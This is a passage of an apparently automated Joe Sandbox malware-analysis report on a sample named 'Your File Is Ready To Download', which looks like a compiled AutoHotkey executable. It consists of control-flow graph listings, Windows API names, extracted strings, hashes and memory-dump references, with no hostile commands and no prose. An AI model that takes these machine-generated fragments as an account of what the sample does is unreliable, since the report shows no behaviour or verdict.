                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F872BC312016808AFB6BAF37A8543E93BE1A74DB89F084019FB460F6F5DB3AC945C751
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 252 14001e310-14001e35d 253 14001e363-14001e36b 252->253 254 14001e35f 252->254 255 14001e371 253->255 256 14001e4b7-14001e4be 253->256 254->253 257 14001e373-14001e38c PostThreadMessageW 255->257 258 14001e4d2-14001e4dc 256->258 259 14001e4c0-14001e4cc Shell_NotifyIconW 256->259 260 14001e38e-14001e39b Sleep 257->260 261 14001e39d-14001e3a8 GetTickCount 257->261 262 14001e4e0-14001e4e6 258->262 259->258 260->257 260->261 263 14001e3b0-14001e3d0 GetExitCodeThread 261->263 264 14001e4e8-14001e4f0 IsWindow 262->264 265 14001e4fb-14001e502 262->265 269 14001e3d2-14001e3df GetTickCount 263->269 270 14001e3eb-14001e3ff CloseHandle call 14000bd80 263->270 264->265 266 14001e4f2-14001e4f5 DestroyWindow 264->266 267 14001e504 DeleteObject 265->267 268 14001e50a-14001e511 265->268 266->265 267->268 271 14001e513 DeleteObject 268->271 272 14001e519-14001e520 268->272 273 14001e3e1-14001e3e9 Sleep 269->273 274 14001e404-14001e40b 269->274 270->274 271->272 276 14001e522 DeleteObject 272->276 277 14001e528-14001e52f 272->277 273->263 278 14001e42c-14001e42f 274->278 279 14001e40d-14001e410 274->279 276->277 277->262 282 14001e531 277->282 280 14001e431-14001e43e CloseHandle 278->280 281 14001e445-14001e44c 278->281 279->281 283 14001e412-14001e42a CreateMutexW 279->283 280->281 284 14001e46e-14001e472 281->284 285 14001e44e-14001e452 281->285 286 14001e538-14001e53e 282->286 283->281 288 14001e488-14001e48b 284->288 289 14001e474-14001e481 CloseHandle 284->289 287 14001e454-14001e46c CreateMutexW 285->287 285->288 290 14001e553-14001e55a 286->290 291 14001e540-14001e543 286->291 287->288 288->256 292 14001e48d-14001e4b0 call 1400b2590 288->292 289->288 295 14001e55c-14001e564 IsWindow 290->295 296 14001e570-14001e577 290->296 293 14001e545-14001e54b DeleteObject 291->293 294 14001e54d DestroyIcon 291->294 292->256 293->290 294->290 295->296 300 14001e566-14001e56a DestroyWindow 295->300 297 14001e579 DeleteObject 296->297 298 14001e57f-14001e586 296->298 297->298 301 14001e588 DeleteObject 298->301 302 14001e58e-14001e595 298->302 300->296 301->302 304 14001e597 DeleteObject 302->304 305 14001e59d-14001e5a4 302->305 304->305 305->286 306 14001e5a6-14001e5ae 305->306 307 14001e5cd-14001e5d5 306->307 308 14001e5b0-14001e5cb call 14008dfa0 306->308 310 14001e5d7-14001e5da 307->310 311 14001e60d-14001e617 307->311 308->307 315 14001e5e0-14001e5f2 310->315 312 14001e619-14001e626 DestroyIcon * 2 311->312 313 14001e62c-14001e636 311->313 312->313 316 14001e654-14001e65b 313->316 317 14001e638 313->317 318 14001e5f4-14001e5fa DeleteObject 315->318 319 14001e600-14001e60b 315->319 321 14001e660-14001e666 316->321 320 14001e640-14001e652 call 1400a0070 317->320 318->319 319->311 319->315 320->316 323 14001e668-14001e670 IsWindow 321->323 324 14001e67b-14001e682 321->324 323->324 326 14001e672-14001e675 DestroyWindow 323->326 324->321 327 14001e684-14001e68e 324->327 326->324 328 14001e696-14001e69e 327->328 329 14001e690 DeleteObject 327->329 330 14001e6a9-14001e6b0 328->330 331 14001e6a0-14001e6a7 328->331 329->328 332 14001e6ee-14001e6f5 330->332 333 14001e6b2-14001e6bc 330->333 331->330 331->332 336 14001e6f7-14001e718 mciSendStringW 332->336 337 14001e72f-14001e75b DeleteCriticalSection OleUninitialize 332->337 334 14001e6d3-14001e6e1 ChangeClipboardChain 333->334 335 14001e6be-14001e6c6 333->335 339 14001e6e7 334->339 335->334 338 14001e6c8-14001e6d1 335->338 336->337 340 14001e71a-14001e729 mciSendStringW 336->340 341 14001e77e-14001e78f 337->341 342 14001e75d-14001e765 337->342 338->339 339->332 340->337 343 14001e7b2-14001e7c3 341->343 344 14001e791-14001e799 341->344 342->341 345 14001e767-14001e76e 342->345 348 14001e7e5-14001e800 343->348 349 14001e7c5-14001e7cd 343->349 344->343 347 14001e79b-14001e7a2 344->347 350 14001e775-14001e77d call 1400c9a08 345->350 351 14001e770 call 1400c9a10 345->351 353 14001e7a4 call 1400c9a10 347->353 354 14001e7a9-14001e7b1 call 1400c9a08 347->354 349->348 355 14001e7cf-14001e7d6 349->355 350->341 351->350 353->354 354->343 360 14001e7d8 call 1400c9a10 355->360 361 14001e7dd-14001e7e0 call 1400c9a08 355->361 360->361 361->348
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Delete$Object$DestroyWindow$Icon$CloseHandle$CountCreateMutexSendSleepStringThreadTick$ChainChangeClipboardCodeCriticalExitMessageNotifyPostSectionShell_Uninitialize
                                                                                                                                                                                                                          • String ID: 2$AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.$close AHK_PlayMe$status AHK_PlayMe mode
                                                                                                                                                                                                                          • API String ID: 2336381626-2823248856
                                                                                                                                                                                                                          • Opcode ID: 536fcb709e031f675d40a0d53f38a6471f96609f5d4677f3a3aebe50a4842947
                                                                                                                                                                                                                          • Instruction ID: fbc89e23a0ae570d136b2c5b4310d3c364cbfaa3f00c522c090f31251781069b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 536fcb709e031f675d40a0d53f38a6471f96609f5d4677f3a3aebe50a4842947
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FE10635201A8086FB6A9F67E8547ED23A1BB9CFC8F484525EB1A4B6B4DF39C845C350
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 365 140055950-14005597b 366 14005597d-140055993 RegisterWindowMessageW 365->366 367 140055999-1400559aa 365->367 366->367 368 1400559fc-140055a07 367->368 369 1400559ac-1400559b3 367->369 370 140055a0f-140055a26 368->370 371 140055a09-140055a0c 368->371 372 1400559b5-1400559bc 369->372 373 1400559be-1400559c5 369->373 375 140055b8a-140055b91 370->375 376 140055a2c 370->376 371->370 372->368 372->373 373->368 374 1400559c7-1400559e9 call 1400044c0 373->374 390 1400559f5 374->390 391 1400559eb-1400559f0 374->391 378 140055b97 375->378 379 1400560fd-140056104 375->379 380 140055a32-140055a3a 376->380 381 140055b6d-140055b7d call 140056640 376->381 383 1400560b2-1400560bc 378->383 384 140055b9d-140055ba4 378->384 385 1400561b8-1400561c3 379->385 386 14005610a 379->386 387 140056041-140056048 380->387 388 140055a40-140055a56 380->388 399 14005606d-140056079 DefWindowProcW 381->399 409 140055b83-140055b85 381->409 392 1400560be-1400560c7 383->392 393 1400560c9-1400560cc 383->393 394 140055baa 384->394 395 14005602b-140056032 384->395 385->387 396 1400561c9-1400561df 385->396 397 140056147-14005614e 386->397 398 14005610c-140056113 386->398 387->399 400 14005604a-140056051 387->400 388->381 390->368 403 14005608f-1400560a8 391->403 402 14005607f-140056087 392->402 404 1400560ce-1400560fb SendMessageTimeoutW 393->404 405 140056140-140056142 393->405 410 140055bb0-140055bb8 394->410 411 140055fea-14005601d GetMenu CheckMenuItem 394->411 412 140056034-14005603b 395->412 413 1400560a9-1400560b0 395->413 407 140056150-140056157 397->407 408 140056159-140056176 PostMessageW 397->408 398->387 406 140056119-140056131 PostMessageW call 140004db0 398->406 399->402 400->399 414 140056053-140056066 call 14001f0f0 400->414 402->403 404->402 405->402 406->405 429 140056133-140056138 406->429 407->408 416 14005617c-140056186 407->416 408->416 409->402 417 140055fb5-140055fbc 410->417 418 140055bbe-140055bc0 410->418 411->399 419 14005601f-140056029 411->419 412->387 412->397 413->399 414->399 428 140056068 call 14001f1e0 414->428 416->405 422 140056188-1400561b3 SendMessageTimeoutW 416->422 423 140055fbe-140055fc5 417->423 424 140055fcb-140055fd5 417->424 425 140055bc6-140055bc9 418->425 426 140055f9a-140055f9d 418->426 419->399 422->402 423->399 423->424 424->399 431 140055fdb 424->431 425->387 432 140055bcf-140055bd3 425->432 426->399 430 140055fa3-140055faa 426->430 428->399 429->405 433 14005613b call 140001ac0 429->433 430->405 434 140055fb0 430->434 435 140055fdd-140055fe5 ShowWindow 431->435 436 140055c36-140055c3d 432->436 437 140055bd5-140055bdf 432->437 433->405 434->429 435->402 436->399 438 140055c43-140055c4a 436->438 439 140055be1-140055be7 437->439 440 140055c1e-140055c25 437->440 438->399 441 140055c50-140055c5a 438->441 439->435 442 140055bed-140055c19 MoveWindow 439->442 440->399 443 140055c2b-140055c2f 440->443 444 140055c61-140055c64 441->444 442->402 443->441 445 140055c31 443->445 446 140055c66-140055c6f 444->446 447 140055c71-140055c79 444->447 445->399 446->444 446->447 448 140055cb2 447->448 449 140055c7b-140055c8c 447->449 451 140055cb9-140055cc7 448->451 450 140055c90-140055c93 449->450 452 140055c95-140055c9e 450->452 453 140055ca0-140055ca3 450->453 454 140055ccd-140055cd1 451->454 455 140055eac-140055eb8 451->455 452->450 452->453 453->399 458 140055ca9-140055cb0 453->458 459 140055d45-140055d4c 454->459 460 140055cd3-140055cda 454->460 456 140055ec3-140055ee5 GetClientRect 455->456 457 140055eba-140055ebd 455->457 461 140055ee7-140055eed 456->461 462 140055eef 456->462 457->405 457->456 458->451 464 140055e78-140055e7c 459->464 465 140055d52-140055d57 459->465 460->399 463 140055ce0-140055ce7 460->463 467 140055ef2-140055f0e 461->467 462->467 468 140055ce9-140055cf0 463->468 469 140055cfb-140055cfe 463->469 464->399 466 140055e82-140055ea7 GetClipBox FillRect 464->466 470 140055d61 465->470 471 140055d59-140055d5f 465->471 466->402 472 140055f54-140055f95 MoveWindow InvalidateRect 467->472 473 140055f10-140055f17 467->473 468->399 474 140055cf6-140055cf9 468->474 475 140055d0b-140055d1f SetBkColor 469->475 476 140055d64-140055d72 470->476 471->476 472->402 477 140055f2e-140055f35 473->477 478 140055f19-140055f28 MoveWindow 473->478 474->469 479 140055d00-140055d05 GetSysColor 474->479 480 140055d21-140055d24 SetTextColor 475->480 481 140055d2a-140055d31 475->481 482 140055dd5-140055dfb DrawIconEx 476->482 483 140055d74-140055dd3 CreateCompatibleDC SelectObject BitBlt SelectObject DeleteDC 476->483 484 140055f37-140055f4c MoveWindow 477->484 485 140055f52 477->485 478->477 479->475 480->481 481->402 486 140055d37-140055d40 GetSysColorBrush 481->486 487 140055e01-140055e4b ExcludeClipRect CreateRectRgn GetClipRgn 482->487 483->487 484->485 485->472 486->402 488 140055e56-140055e73 FillRgn DeleteObject 487->488 489 140055e4d-140055e50 GetSysColorBrush 487->489 488->402 489->488
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageRegisterWindow
                                                                                                                                                                                                                          • String ID: $TaskbarCreated
                                                                                                                                                                                                                          • API String ID: 1814269913-2756569325
                                                                                                                                                                                                                          • Opcode ID: 291dd6086e99dd9d6f8bbaaf5691275a1f065325395cc6b74e9419111b1670fe
                                                                                                                                                                                                                          • Instruction ID: 10a70ac5a9c71e9686d6df8eb2443ac56088ee968df548d9cd342b1781673693
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 291dd6086e99dd9d6f8bbaaf5691275a1f065325395cc6b74e9419111b1670fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F229A352006808AEB66DF23E4543EA77A1F74CBC5F544125EB8A47BB5DB3ED846CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$Window$Load$Create$ClassShow$FindLockMenuMessageMetricsRegisterSendSystem$AcceleratorsCapsCursorDeviceEnableEnumFontForegroundFromIconItemLibraryLongNameNamesReleaseSizeof
                                                                                                                                                                                                                          • String ID: AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
                                                                                                                                                                                                                          • API String ID: 221421807-2636979444
                                                                                                                                                                                                                          • Opcode ID: 90afefe1982542b1df402e3b2bbab0c3d094468b07abbb46b60687b060dd9300
                                                                                                                                                                                                                          • Instruction ID: deccdb4611fe9f85c5c7160099d911744b73bf0f286478aee23196a717939e1f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90afefe1982542b1df402e3b2bbab0c3d094468b07abbb46b60687b060dd9300
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC13A35209B8086E7629B22F8547DE73A4FB8DBD4F540129EB8A4BB74DF39C446CB40
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Handle$CloseCurrentDirectoryErrorLast$AddressAttributesCreateExecuteFileFormatMessageModuleProcProcessShell
                                                                                                                                                                                                                          • String ID: Verb: <%s>$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$%s %s$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
                                                                                                                                                                                                                          • API String ID: 187721205-758568768
                                                                                                                                                                                                                          • Opcode ID: 471131ebf4bda3c1ac380055e9bd9c2b49a3ac24d086a7616b605554f189cd59
                                                                                                                                                                                                                          • Instruction ID: 6a9bd07949d4fcb760873eb5b0fd3d8ce3bba799bfa8d67ab086fd5e611208b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 471131ebf4bda3c1ac380055e9bd9c2b49a3ac24d086a7616b605554f189cd59
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C428D31604B9095EB66DF22A8403E923A4FB8DBE8F494225FF5947BE9EF38C545C344
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessageTimerUnlock
                                                                                                                                                                                                                          • String ID: #32770
                                                                                                                                                                                                                          • API String ID: 1115112458-463685578
                                                                                                                                                                                                                          • Opcode ID: b2009a66af35570ec9bdce5f5762ba844639f0ad7a31dc4d085b2c65bef5c8fa
                                                                                                                                                                                                                          • Instruction ID: f9e8195622c78a912830177e5ffa7a406774e739d0b7d5f3ef3fa34a85a4024a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2009a66af35570ec9bdce5f5762ba844639f0ad7a31dc4d085b2c65bef5c8fa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB5261B26056808AFB67CB27B8543E937A1F78DBC8F184016EB49477B5DB79C981C710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Sleep$FindInfoParametersSystem$CriticalCurrentDirectoryErrorInitializeMessageModePostSectionmallocwcsncpy
                                                                                                                                                                                                                          • String ID: /ErrorStdOut$/force$/restart$A_Args$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Clipboard$Could not close the previous instance of this script. Keep waiting?$Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 2566495380-2645802949
                                                                                                                                                                                                                          • Opcode ID: bff7d64b8f8432795a84a9f4655cc25003ab4d2dbd136d0db3873710a4e963b1
                                                                                                                                                                                                                          • Instruction ID: edc770666cac76ee2ced73777439dfce5b6a7653ca6ef59a822db6353ee09248
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bff7d64b8f8432795a84a9f4655cc25003ab4d2dbd136d0db3873710a4e963b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C52BF72204B8186FB67EB26F4503EA67A1FB8EBD5F444112FB4A476B5EB38C941C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1252 1400d1724-1400d176c call 1400d1220 1255 1400d176e-1400d1770 1252->1255 1256 1400d1775-1400d1778 1252->1256 1257 1400d1e5a-1400d1e83 call 1400d0790 1255->1257 1258 1400d177a-1400d178c __doserrno _errno _invalid_parameter_noinfo 1256->1258 1259 1400d1799-1400d17cf 1256->1259 1263 1400d1791-1400d1794 1258->1263 1261 1400d17d7-1400d17de 1259->1261 1262 1400d17d1-1400d17d5 1259->1262 1261->1258 1265 1400d17e0-1400d17e6 1261->1265 1262->1261 1262->1265 1263->1257 1266 1400d17f5-1400d17fe _isatty 1265->1266 1267 1400d17e8-1400d17f0 call 1400d3484 1265->1267 1269 1400d1ace-1400d1adf 1266->1269 1270 1400d1804-1400d1815 1266->1270 1267->1266 1272 1400d1ae5-1400d1aed 1269->1272 1273 1400d1de3-1400d1dff WriteFile 1269->1273 1270->1269 1271 1400d181b-1400d184b call 1400cd148 GetConsoleMode 1270->1271 1271->1269 1289 1400d1851-1400d1853 1271->1289 1277 1400d1bbe-1400d1bc2 1272->1277 1278 1400d1af3-1400d1af6 1272->1278 1274 1400d1e05-1400d1e0b 1273->1274 1275 1400d1ab8-1400d1ac0 GetLastError 1273->1275 1281 1400d1db1-1400d1db3 1274->1281 1275->1281 1279 1400d1ca0-1400d1ca3 1277->1279 1280 1400d1bc8-1400d1bcb 1277->1280 1283 1400d1e19-1400d1e2f 1278->1283 1284 1400d1afc 1278->1284 1279->1283 1285 1400d1ca9 1279->1285 1280->1283 1288 1400d1bd1 1280->1288 1286 1400d1db9-1400d1dbb 1281->1286 1287 1400d1e54-1400d1e58 1281->1287 1290 1400d1e3c-1400d1e4f _errno __doserrno 1283->1290 1291 1400d1e31-1400d1e36 1283->1291 1292 1400d1aff-1400d1b0b 1284->1292 1293 1400d1caf-1400d1cb4 1285->1293 1286->1283 1294 1400d1dbd-1400d1dc0 1286->1294 1287->1257 1295 1400d1bd6-1400d1be2 1288->1295 1296 1400d185e-1400d1872 GetConsoleCP 1289->1296 1297 1400d1855-1400d1858 1289->1297 1290->1263 1291->1255 1291->1290 1298 1400d1b0d-1400d1b16 1292->1298 1299 1400d1cb6-1400d1cbf 1293->1299 1300 1400d1e0d-1400d1e14 call 1400cd69c 1294->1300 1301 1400d1dc2-1400d1dd4 _errno __doserrno 1294->1301 1302 1400d1be4-1400d1bed 1295->1302 1303 1400d1ac5-1400d1ac9 1296->1303 1304 1400d1878-1400d187b 1296->1304 1297->1269 1297->1296 1305 1400d1b3f-1400d1b83 WriteFile 1298->1305 1306 1400d1b18-1400d1b21 1298->1306 1310 1400d1cf0-1400d1d38 WideCharToMultiByte 1299->1310 1311 1400d1cc1-1400d1cce 1299->1311 1300->1263 1301->1263 1313 1400d1bef-1400d1bfc 1302->1313 1314 1400d1c21-1400d1c65 WriteFile 1302->1314 1303->1286 1315 1400d1a05-1400d1a09 1304->1315 1316 1400d1881-1400d18a0 1304->1316 1305->1275 1309 1400d1b89-1400d1b9f 1305->1309 1307 1400d1b2e-1400d1b3d 1306->1307 1308 1400d1b23-1400d1b2b 1306->1308 1307->1298 1307->1305 1308->1307 1309->1281 1319 1400d1ba5-1400d1bb3 1309->1319 1324 1400d1d3e 1310->1324 1325 1400d1dd9-1400d1de1 GetLastError 1310->1325 1322 1400d1cd0-1400d1cd8 1311->1322 1323 1400d1cdc-1400d1cee 1311->1323 1327 1400d1bfe-1400d1c09 1313->1327 1328 1400d1c0d-1400d1c1f 1313->1328 1314->1275 1329 1400d1c6b-1400d1c81 1314->1329 1320 1400d1a0b-1400d1a0f 1315->1320 1321 1400d1a11-1400d1a2d 1315->1321 1317 1400d18c2-1400d18cc call 1400cac70 1316->1317 1318 1400d18a2-1400d18c0 1316->1318 1347 1400d18ce-1400d18db 1317->1347 1348 1400d1902-1400d1908 1317->1348 1335 1400d190b-1400d1918 call 1400d3a44 1318->1335 1319->1292 1330 1400d1bb9 1319->1330 1320->1321 1331 1400d1a2f 1320->1331 1332 1400d1a34-1400d1a38 1321->1332 1322->1323 1323->1299 1323->1310 1337 1400d1d40-1400d1d7d WriteFile 1324->1337 1333 1400d1dac 1325->1333 1327->1328 1328->1302 1328->1314 1329->1281 1334 1400d1c87-1400d1c95 1329->1334 1330->1281 1331->1332 1340 1400d1a40-1400d1a4f call 1400d607c 1332->1340 1341 1400d1a3a-1400d1a3e 1332->1341 1333->1281 1334->1295 1338 1400d1c9b 1334->1338 1357 1400d191e-1400d195b WideCharToMultiByte 1335->1357 1358 1400d1aaf-1400d1ab3 1335->1358 1343 1400d1d7f-1400d1d86 1337->1343 1344 1400d1d8a-1400d1d90 GetLastError 1337->1344 1338->1281 1340->1275 1359 1400d1a51-1400d1a57 1340->1359 1341->1340 1345 1400d1a7a 1341->1345 1343->1337 1350 1400d1d88 1343->1350 1351 1400d1d92-1400d1d95 1344->1351 1353 1400d1a7f-1400d1a87 1345->1353 1354 1400d1a8e-1400d1aa6 1347->1354 1355 1400d18e1-1400d18ec 1347->1355 1348->1335 1350->1351 1351->1333 1352 1400d1d97-1400d1da6 1351->1352 1352->1293 1352->1333 1353->1358 1360 1400d1a89 1353->1360 1354->1358 1361 1400d18ef-1400d18f7 call 1400d3a44 1355->1361 1357->1358 1362 1400d1961-1400d1990 WriteFile 1357->1362 1358->1281 1359->1345 1364 1400d1a59-1400d1a72 call 1400d607c 1359->1364 1360->1304 1361->1358 1368 1400d18fd-1400d1900 1361->1368 1362->1275 1365 1400d1996-1400d19a4 1362->1365 1364->1275 1372 1400d1a74-1400d1a76 1364->1372 1365->1358 1366 1400d19aa-1400d19b4 1365->1366 1366->1353 1370 1400d19ba-1400d19ec WriteFile 1366->1370 1368->1357 1370->1275 1371 1400d19f2-1400d19f7 1370->1371 1371->1358 1373 1400d19fd-1400d1a03 1371->1373 1372->1345 1373->1353
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
